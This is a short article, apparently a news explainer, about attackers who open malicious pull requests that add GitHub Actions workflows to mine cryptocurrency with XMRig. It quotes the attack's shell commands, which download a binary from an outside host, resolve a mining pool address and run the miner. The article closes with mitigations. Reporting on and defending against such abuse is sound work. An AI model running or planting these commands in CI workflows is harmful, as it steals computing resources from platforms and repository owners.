How Hackers Hijack GitHub Actions to Run Free Crypto Mining

Cryptocurrency prices have surged, making GPUs expensive, leading hackers to seek cheap mining resources by abusing GitHub’s free server infrastructure.

Attackers submit malicious pull requests (PRs) that add a GitHub Action workflow (ci.yml) which downloads and runs a mining binary (often XMRig) on GitHub’s runners.

The first reported case was discovered by a French developer “Tib” in November, who noticed a PR from user “y4ndexhater1” with no description on a repository with zero stars. The PR added a workflow that executed a base64‑encoded command to download a binary, set executable permissions, and run it.

apt update -qq
apt install -y curl git jq
curl -Lfo prog https://github.com/.../prog || curl -Lfo prog https://transfer.sh/OSPjK/prog
ip=$(curl -s -H 'accept: application/dns-json' 'https://dns.google/resolve?name=poolio.magratmail.xyz&type=A' | jq -r '.Answer[0].data')
chmod u+x prog
timeout 4h ./prog -o "${ip}:3000" -u ChrisBarnatt -p ExplainingComputers --cpu-priority 5 > /dev/null

Analysis of the binary showed it was a modified XMRig miner (version 6.8.1). The attack can run dozens of miners per PR, generating small but cumulative profits.

GitHub can ban offending accounts, but attackers use “guerrilla” tactics, creating new accounts and repeatedly opening and closing PRs to evade detection. Similar abuse has been observed on Docker Hub, Travis CI, CircleCI, and even GitLab, where miners are disguised as npm packages.

Mitigation includes disabling automatic workflow runs on PRs, restricting actions to trusted sources, or limiting execution to self‑hosted runners. However, completely eradicating the abuse is difficult.

Security researchers estimate thousands of malicious commits and builds across CI platforms, translating to tens of thousands of mining tasks.